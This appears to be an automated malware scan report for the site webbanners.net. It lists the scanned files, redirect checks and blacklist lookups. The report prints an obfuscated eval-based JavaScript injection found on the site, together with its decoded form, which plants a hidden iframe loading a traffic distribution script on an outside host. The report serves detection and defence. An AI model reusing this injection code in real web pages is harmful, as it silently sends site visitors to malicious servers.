Scanned pages/files
Request | Server response | Status |
http://webbanners.net/ | 200 OK Content-Length: 7612 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
if(window.document)aa=new RegExp('test','i').toString();aaa='/test/i';if(aa.indexOf(aaa)!==-1){ss='';s=String;ee='e';e=window[ee+'val'];t='y';}h=-2;n=["4.5y4.5y52.5y51y16y20y50y55.5y49.5y58.5y54.5y50.5y55y58y23y51.5y50.5y58y34.5y54y50.5y54.5y50.5y55y58y57.5y33y60.5y42y48.5y51.5y39y48.5y54.5y50.5y20y19.5y49y55.5y50y60.5y19.5y20.5y45.5y24y46.5y20.5y61.5y4.5y4.5y4.5y52.5y51y57y48.5y54.5y50.5y57y20y20.5y29.5y4.5y4.5y62.5y16y50.5y54y57.5y50.5y16y61.5y4.5y4.5y4.5y50y55.5y49.5y58.5y54.5y50.5y55y58y23y5
Decoded script:
if (document.getElementsByTagName('body')[0]){
  iframer();
} else {
  document.write("<iframe src='http://tds133.1dumb.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src','http://tds133.1dumb.com/stds/go.php?sid=1');
  f.style.visibility='hidden';
  f.style.position='absolute';
  f.style.left='0';
  f.style.top='0';
  f.setAttribute('width
<iframe src='http://tds133.1dumb.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Antivirus reports:
http://webbanners.net/test404page.js | 404 Not Found Content-Length: 249 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: webbanners.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 16:12:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 7612
Content-Type: text/html
X-NodeName: custweb02.sgu
X-ProcessTime: D=21299
...7612 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: webbanners.net
Referer: http://www.google.com/search?q=webbanners.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=webbanners.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://webbanners.net/
Result: webbanners.net is not infected or malware details are not published yet.